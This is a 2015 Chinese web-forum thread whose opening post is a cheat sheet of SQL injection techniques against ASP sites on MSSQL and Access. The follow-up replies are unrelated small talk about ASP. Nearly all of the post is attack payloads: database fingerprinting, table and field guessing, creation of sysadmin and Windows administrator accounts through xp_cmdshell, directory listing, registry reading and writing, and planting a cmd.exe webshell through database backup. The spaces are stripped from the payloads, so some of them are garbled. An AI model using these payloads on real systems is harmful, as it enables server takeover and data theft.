仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 425|回复: 8
打印 上一主题 下一主题

[学习教程] ASP网页设计ASP罕见注进技能

[复制链接]
若天明 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 22:05:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
由于ASP还是一种Script语言所没除了大量使用组件外,没有办法提高其工作效率。它必须面对即时编绎的时间考验,同时我们还不知其背后的组件会是一个什么样的状况;进修一下注进技能也何尝不是件功德,亲信知彼嘛。能够更无效的避免注进,让网站加倍平安1.判别是不是有注进
;and1=1
;and1=2

2.开端判别是不是是mssql
;anduser>0

3.注进参数是字符
and[查询前提]and=

4.搜刮时没过滤参数的
and[查询前提]and%25=

5.判别数据库体系
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access

6.猜数据库
;and(SelectCount(*)from[数据库名])>0

7.猜字段
;and(SelectCount(字段名)from数据库名)>0

8.猜字段中纪录长度
;and(selecttop1len(字段名)from数据库名)>0

9.(1)猜字段的ascii值(access)
;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0

(2)猜字段的ascii值(mssql)
;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0

10.测试权限布局(mssql)
;and1=(SELECTIS_SRVROLEMEMBER(sysadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(serveradmin));--
;and1=(SELECTIS_SRVROLEMEMBER(setupadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(securityadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(diskadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(bulkadmin));--
;and1=(SELECTIS_MEMBER(db_owner));--

11.增加mssql和体系的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshellnetuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add;--
;execmaster.dbo.xp_cmdshellnetuserusernamepassword/add;--
;execmaster.dbo.xp_cmdshellnetlocalgroupadministratorsusername/add;--

12.(1)遍历目次
;createtabledirs(pathsvarchar(100),idint)
;insertdirsexecmaster.dbo.xp_dirtreec:
;and(selecttop1pathsfromdirs)>0
;and(selecttop1pathsfromdirswherepathsnotin(上步失掉的paths))>)

(2)遍历目次
;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
;inserttempexecmaster.dbo.xp_availablemedia;--取得以后一切驱动器
;insertintotemp(id)execmaster.dbo.xp_subdirsc:;--取得子目次列表
;insertintotemp(id,num1)execmaster.dbo.xp_dirtreec:;--取得一切子目次的目次树布局
;insertintotemp(id)execmaster.dbo.xp_cmdshelltypec:webindex.asp;--检察文件的内容

13.mssql中的存储历程
xp_regenumvalues注册表根键,子键
;execxp_regenumvaluesHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun以多个纪录集体例前往一切键值
xp_regread根键,子键,键值名
;execxp_regreadHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir前往制订键的值
xp_regwrite根键,子键,值名,值范例,值
值范例有2种REG_SZ暗示字符型,REG_DWORD暗示整型
;execxp_regwriteHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,
TestValueName,reg_sz,hello写进注册表
xp_regdeletevalue根键,子键,值名
execxp_regdeletevalueHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName删除某个值
xp_regdeletekeyHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTestkey删除键,包含该键下一切值

14.mssql的backup创立webshell
usemodel
createtablecmd(strimage);
insertintocmd(str)values(<%DimoScript%>);
backupdatabasemodeltodisk=c:l.asp;

15.mssql内置函数
;and(select@@version)>0取得Windows的版本号
;anduser_name()=dbo判别以后体系的毗连用户是否是sa
;and(selectuser_name())>0爆以后体系的毗连用户
;and(selectdb_name())>0失掉以后毗连的数据库



16.简便的webshell
usemodel
createtablecmd(strimage);
insertintocmd(str)values(<%=server.createobject("wscript.shell").exec("cmd.exe/c"&request("c")).stdout.readall%>);
backupdatabasemodeltodisk=g:wwwtestl.asp
源代码保护方面其实现在考虑得没那么多了..NET也可以反编译.ASP写得复杂的话别人能看得懂的话.他也有能力自己写了.这方面担心的倒不太多.纵观现在网上可以下载的那些所谓BBS还有什么网站等等的源代码
深爱那片海 该用户已被删除
沙发
发表于 2015-1-18 20:18:02 | 只看该作者
虽然ASP也有很多网络教程。但是这些都不系统。都是半路出家,只是从一个例子告诉你怎么用。不会深入讨论,更不会将没有出现在例子里的方法都一一列举出来。
柔情似水 该用户已被删除
板凳
发表于 2015-1-25 13:01:59 | 只看该作者
Application:这个存储服务端的数据,如果不清除,会直到web应用程序结束才清除(例如重启站点)
愤怒的大鸟 该用户已被删除
地板
发表于 2015-2-2 22:13:11 | 只看该作者
兴趣爱好,那么你无须学编程,申请一个域名和空间,在网上下载一些免费开源的CMS系统,你不用改代码,只须熟悉它们的后台操作,像office一样简单方便,很快就能建一个站点,很多站长都是这样做的
不帅 该用户已被删除
5#
发表于 2015-2-8 12:29:42 | 只看该作者
掌握asp的特性而且一定要知道为什么。
灵魂腐蚀 该用户已被删除
6#
发表于 2015-2-25 14:38:21 | 只看该作者
那么,ASP.Net有哪些改进呢?
小女巫 该用户已被删除
7#
发表于 2015-3-7 22:28:49 | 只看该作者
用户端的浏览器不需要提供任何别的支持,这样大提高了用户与服务器之间的交互的速度。
谁可相欹 该用户已被删除
8#
发表于 2015-3-15 15:51:29 | 只看该作者
Response:从字面上讲是“响应”,因此这个是服务端向客户端发送东西的,例如Response.Write
金色的骷髅 该用户已被删除
9#
发表于 2015-3-22 02:44:25 | 只看该作者
ASP也是这几种脚本语言中最简单易学的开发语言。但ASP也是这几种语言中唯一的一个不能很好支持跨平台的语言。  因为ASP脚本语言非常简单,因此其代码也简单易懂,结合HTML代码,可快速地完成网站的应用程序。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-24 11:15

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表